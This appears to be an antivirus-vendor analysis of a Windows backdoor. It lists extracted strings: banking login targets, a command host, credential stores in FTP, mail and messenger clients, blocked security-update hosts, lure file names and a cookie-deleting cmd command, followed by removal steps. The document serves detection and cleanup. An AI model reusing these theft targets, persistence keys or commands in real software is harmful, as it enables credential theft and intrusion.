money.yandex.ru/prepaid-ns.xml
command=auth_loginByPassword
https://click.alfabank.ru/ALFAIBSR/ControllerServlet
command=auth_loginByPasswordPage
PASS:
CERT:
ftp://
http://
7A5417FF-2D82-553C-F326-2861000FFFF3-0E
POST /show.php HTTP/1.0
User-Agent: Mozilla/4.4 (compatible; MSIE 6.0; Windows NT 5.1)
Host: www.dllupdates.cn:
Accept-Charset: windows-1252, utf-8, utf-16, iso-8859-1;q=0.6, *;q=0.1
www.dllupdates.cn
/index.html
Content-Type: application/x-www-form-urlencoded
:.txf
:..tqR
Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\
.bmp::
ole32.dll
AUHook.dll
{BCBCD383-3E06-11D3-91A9-00C04F68105C}SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\AUHook
{A4C110AE-0291-F12A-2920-F0E455440770}SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\
Software\Microsoft\Windows\CurrentVersion\Run\Machine Debug Manager
mdmi386.exe
Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\
Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{77770022-0D68-4D14-BF25-6747ACFA95DE}CLSID\{77770022-0D68-4D14-BF25-6747ACFA95DE}\InprocServer32CLSID\{77770022-0D68-4D14-BF25-6747ACFA95DE}\InprocServer32\CLSID\{77770022-0D68-4D14-BF25-6747ACFA95DE}\InprocServer32\ThreadingModel{77770022-0D68-4D14-BF25-6747ACFA95DE}.164.KWM::
crypt32.dll
CertOpenSystemStoreA
CertCloseStore
PFXExportCertStore
WEBMONEY.EXE
TOTALCMD.EXE
ntdll.dll
IEXPLORE.EXE
OPERA.EXE
HttpSendRequestA
wininet.dll
EXPLORER.EXE
7A5417FF-2D82-553C-F326-2861000FFFF3-01
dxdiagn.dat
7A5417FF-2D82-553C-F326-2861000FFFF3
More information: http://www.ibsensoftware.com/
217.5.97.137
reg_key
\loader_name.exe
gdiplus.dll
GdiplusShutdown
.text
.reloc
\cplstub.exe
user32.dll
GetWindowsDirectoryA
ShellExecuteA
shell32.dll
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HELO %s.net
HELO %s.com
HELO %s.org
MAIL FROM:<%s>
RCPT TO:<%s>
[email protected]
gold-certs@
certific
.subscribe
certs@
subscribe.ru
.xml@
.gif@
.png@
.jpg@
.mso@
.bezotveta@
.shtm
.dhtm
Microsoft Office 2003 Crack, Working!.exe
Microsoft Windows XP, WinXP Crack, working Keygen.exe
Microsoft Office XP working Crack, Keygen.exe
Porno, sex, oral, anal cool, awesome!!.exe
Porno Screensaver.scr
Serials.txt.exe
KAV 6.0.exe
Kaspersky Antivirus 6.0.exe
Porno pics arhive, xxx.exe
Windows Sourcecode update.doc.exe
Ahead Nero 7.exe
Windown Longhorn Beta Leak.exe
Opera 9 New!.exe
XXX hardcore images.exe
WinAmp 7 New!.exe
WinAmp 7 Pro Keygen Crack Update.exe
Adobe Photoshop 9 full.exe
Matrix 3 Revolution English Subtitles.exe
ACDSee 9.exe
Date: %s
To: "%s" <%s>
From: postcard service
POSTCARD.RU
Comments: The best postcards in web, http://www.postcard.ru
Message-ID: <%s%s>
boundary="----=_POSTCARD.RU_%s"
------=_POSTCARD.RU_%s
Content-Type: text/html; charset="windows-1251"
------=_POSTCARD.RU_%s--
Password: %s
Pass - %s
Password - %s
Re: Msg reply
.ptdm { background:#707075; }.ptdc { background:#90909A; }.plnm { color:#FFFFFF; font-size:10px; font-weight:bold; font-family:Verdana,Tahoma,Arial,Sans-Serif; text-decoration:none; }| http://www.postcard.ru/get/?1%s |
http://www.postcard.ru/
[email protected]
www.aerosib.ru/
www.avinyon.com/
www.basdesign.ru/
www.fivestar.spb.ru/www/index.shtml
www.siticom.ru/index.htm
www.myamoi.ru/index.html
www.firebook.ru/index.html
www.polistroy.kaluga.ru/
www.racus.ru/index.html
www.mir-polov.ru/index.html
www.mobyline.info/index.html
www.imaksi.h15.ru/index.html
advapi32.dll
iphlpapi.dll
SOFTWARE\Microsoft\Windows\ShellNoRoam\MUICache
C:\out.bin
PMODkernel32.dll
|shfolder.dll
psapi.dll
\account.cfg
\account.cfn
\*.dat
%s Database
Password
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\&RQ
\&RQ.exe
crypted-password
\andrq.ini
\Microsoft\Network\Connections\pbk\rasphone.pbk
RasDialParams!%s#0
SOFTWARE\Far\Plugins\FTP\Hosts
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Trillian\
\aim.ini
\users\global\profiles.ini
Software\Ghisler\Windows Commander
FtpIniName
\wcx_ftp.ini
password
INETCOMM Server Passwords
Outlook Account Manager Passwords
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
%s\%s\%s
%s\%s
SMTP Email Address
POP3 Password
POP3 Password2
IMAP Password
IMAP Password2
pstorec.dll
\Mailbox.ini
PassWd
\GlobalSCAPE\CuteFTP\
\GlobalSCAPE\CuteFTP Pro\
\cutftp32.exe
%Program Files%\CuteFTP\
sm.dat
tree.dat
smdata.dat
PasswordSaved
LoginSaved
\edialer.ini
WS_FTP
\*.ini
\Ipswitch\WS_FTP\Sites
\Ipswitch\WS_FTP Home\Sites
\win.ini
\ws_ftp.ini
\ws_ftp.exe
\Opera
\Mail\accounts.ini
\profile\wand.dat
Software\Opera Software
Incoming Password
\Mozilla\Profiles
%Documents and Settings%\%current user%\Application Data\The Bat!\*.*
d:\Procmon.exe
ec.exe
32.exe
ore.exe
D.EXE",-208
.dll,-20003
%Documents and Settings%\%current user%\Trillian\User Settings\
%APPDATA%\GHISLER\wcx_ftp.ini
Identities\{37E80C13-CB45-4DCE-A438-545B791476AC}\Software\Microsoft\Internet Account Manager\AccountsPro\6.0\sm.dat
%WinDir%\edialer.ini
e\Sites\*.ini
%WinDir%\win.ini
%Documents and Settings%\%current user%\Application Data\Opera\*.*\Mail\accounts.ini
%Documents and Settings%\%current user%\Application Data\Mozilla\Profiles\*.*
RegOpenKeyExA
RegOpenKeyA
RegEnumKeyExA
RegCreateKeyExA
RegCreateKeyA
RegCloseKey
UnhookWindowsHookEx
SetWindowsHookExA
GetKeyboardType
.idata
.edata
P.reloc
P.rsrc
.bpbk
.FGDV
KERNEL32.DLL
gdi32.dll
oleaut32.dll
RASAPI32.dll
SHLWAPI.DLL
wsock32.dll
core.dll
export
66006666
iER\wcx_ftp.ini
mdmi386.exe_1064_rwx_13140000_00038000:
.data
.code
Portions Copyright (c) 1983,99 Borland
kernel32.dll
update.symantec
liveupdate.symantecliveupdate
secure.nai
sandbox.norman
uk.trendmicro-europe
HTTP/1.1 403
HTTP/1.1 404
wsock32.dll
svchost.exe
Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\
mdmi386.exe
AUHook.dll
AUHook.dat
7A5417FF-2D82-553C-F326-2861000FFFF3-0E
sfc.dll
cmd /q /c "echo ! && ver && echo. && echo Y | del "%USERPROFILE%\cookies\*.*" && cls "
.text
.idata
.edata
.XV^x
.b.Im
advapi32.dll
RegOpenKeyA
gdi32.dll
ole32.dll
oleaut32.dll
RASAPI32.dll
SHLWAPI.DLL
user32.dll
wininet.dll
core.dll
KWindows
Porti
.ex)N
.MS'fc
"#$%&'()
dD.Gz
P|.Zc
.Cu`k&
.nEZK
adv0pi32x.ql
svchost.exe_1588:
.text
`.data
.rsrc
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
RPCRT4.dll
NETAPI32.dll
ole32.dll
ntdll.dll
RegCloseKey
RegOpenKeyExW
GetProcessHeap
NtOpenKey
svchost.pdb
\PIPE\
Software\Microsoft\Windows NT\CurrentVersion\Svchost
\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
5.1.2600.5512 (xpsp.080413-2111)
svchost.exe
Windows
Operating System
5.1.2600.5512
svchost.exe_1588_rwx_13140000_00038000:
.data
.code
Portions Copyright (c) 1983,99 Borland
kernel32.dll
update.symantec
liveupdate.symantecliveupdate
secure.nai
sandbox.norman
uk.trendmicro-europe
HTTP/1.1 403
HTTP/1.1 404
wsock32.dll
svchost.exe
Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\
mdmi386.exe
AUHook.dll
AUHook.dat
7A5417FF-2D82-553C-F326-2861000FFFF3-0E
sfc.dll
cmd /q /c "echo ! && ver && echo. && echo Y | del "%USERPROFILE%\cookies\*.*" && cls "
.text
.idata
.edata
.XV^x
.b.Im
advapi32.dll
RegOpenKeyA
gdi32.dll
ole32.dll
oleaut32.dll
RASAPI32.dll
SHLWAPI.DLL
user32.dll
wininet.dll
core.dll
KWindows
Porti
.ex)N
.MS'fc
"#$%&'()
dD.Gz
P|.Zc
.Cu`k&
.nEZK
adv0pi32x.ql
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:1316
- Delete the original Backdoor file.
- Delete or disinfect the following files created/modified by the Backdoor:
%System%\AUHook.dll (51 bytes)
%WinDir%\win.ini (106 bytes)
%System%\mdmi386.exe (601 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Machine Debug Manager" = "mdmi386.exe" - Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
